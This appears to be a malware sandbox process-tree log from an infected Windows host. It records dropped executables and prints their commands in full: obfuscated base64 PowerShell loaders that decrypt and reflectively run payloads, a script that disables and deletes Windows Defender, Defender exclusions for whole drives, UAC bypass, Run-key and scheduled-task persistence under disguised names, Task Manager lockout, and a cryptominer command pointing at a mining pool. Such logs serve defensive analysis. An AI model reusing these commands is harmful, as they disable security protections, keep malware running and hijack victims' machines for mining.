C:\Users\Admin\AppData\Local\Temp\Files\native.exeC:\Users\Admin\AppData\Local\Temp\Files\native.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\_wT.exe"C:\Users\Admin\AppData\Local\Temp\Files\_wT.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bat.bat3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\bat.bat4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\bat')6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80728' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"7⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe8⤵
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80728' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gcFlBSmEoJHNORFFLKXskbXpYYlU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JG16WGJVLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskbXpYYlUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRtelhiVS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUThwVWY3K2hyVHVmb1JYSUpwMHRqME1NV3llMld1WnJNK2xFSTdJc1YvST0nKTskbXpYYlUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUVVTbGNFdDNQMVYvbE1ucTJ6SnpHUT09Jyk7JGJ2eWxCPSRtelhiVS5DcmVhdGVEZWNyeXB0b3IoKTskZ1hwcFg9JGJ2eWxCLlRyYW5zZm9ybUZpbmFsQmxvY2soJHNORFFLLDAsJHNORFFLLkxlbmd0aCk7JGJ2eWxCLkRpc3Bvc2UoKTskbXpYYlUuRGlzcG9zZSgpOyRnWHBwWDt9ZnVuY3Rpb24gSUFGaUUoJHNORFFLKXskQWxKaVQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkc05EUUspOyRLbHFseD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JG5IU0l0PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJEFsSmlULFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbkhTSXQuQ29weVRvKCRLbHFseCk7JG5IU0l0LkRpc3Bvc2UoKTskQWxKaVQuRGlzcG9zZSgpOyRLbHFseC5EaXNwb3NlKCk7JEtscWx4LlRvQXJyYXkoKTt9JGhUdG9sPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskaEdyRW49SUFGaUUgKHBZQUphIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJGhUdG9sLCA1KS5TdWJzdHJpbmcoMikpKSk7JGxWQkxvPUlBRmlFIChwWUFKYSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRoVHRvbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kbFZCTG8pLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGhHckVuKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\bat.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gcFlBSmEoJHNORFFLKXskbXpYYlU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JG16WGJVLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskbXpYYlUuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRtelhiVS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUThwVWY3K2hyVHVmb1JYSUpwMHRqME1NV3llMld1WnJNK2xFSTdJc1YvST0nKTskbXpYYlUuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUVVTbGNFdDNQMVYvbE1ucTJ6SnpHUT09Jyk7JGJ2eWxCPSRtelhiVS5DcmVhdGVEZWNyeXB0b3IoKTskZ1hwcFg9JGJ2eWxCLlRyYW5zZm9ybUZpbmFsQmxvY2soJHNORFFLLDAsJHNORFFLLkxlbmd0aCk7JGJ2eWxCLkRpc3Bvc2UoKTskbXpYYlUuRGlzcG9zZSgpOyRnWHBwWDt9ZnVuY3Rpb24gSUFGaUUoJHNORFFLKXskQWxKaVQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkc05EUUspOyRLbHFseD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JG5IU0l0PU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJEFsSmlULFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskbkhTSXQuQ29weVRvKCRLbHFseCk7JG5IU0l0LkRpc3Bvc2UoKTskQWxKaVQuRGlzcG9zZSgpOyRLbHFseC5EaXNwb3NlKCk7JEtscWx4LlRvQXJyYXkoKTt9JGhUdG9sPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskaEdyRW49SUFGaUUgKHBZQUphIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJGhUdG9sLCA1KS5TdWJzdHJpbmcoMikpKSk7JGxWQkxvPUlBRmlFIChwWUFKYSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRoVHRvbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kbFZCTG8pLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGhHckVuKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "5⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\32.exe"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 2723⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"2⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"3⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "4⤵
-
C:\DriverHostCrtNet\comSvc.exe"C:\DriverHostCrtNet\comSvc.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iR4PpyYAmz.bat"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\bang_executor.exe"C:\Users\Admin\AppData\Local\Temp\Files\bang_executor.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat" "3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\bang.bat" "5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\bang_executor.exebang_executor.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\executer.exeexecuter.exe6⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps17⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass .\test.ps1;8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K instaling.bat6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K mgr.bat6⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f7⤵
-
C:\Windows\system32\mode.commode 65,101⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p1979614625696244291525413362 -oextracted1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bugaib" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\bugai.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bugai" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\bugai.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bugaib" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\bugai.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vbcv" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Downloads\vbc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vbc" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\vbc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "vbcv" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Downloads\vbc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\odt\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winhostDhcp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4044 -ip 40441⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exeC:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exeC:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\Sorting\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
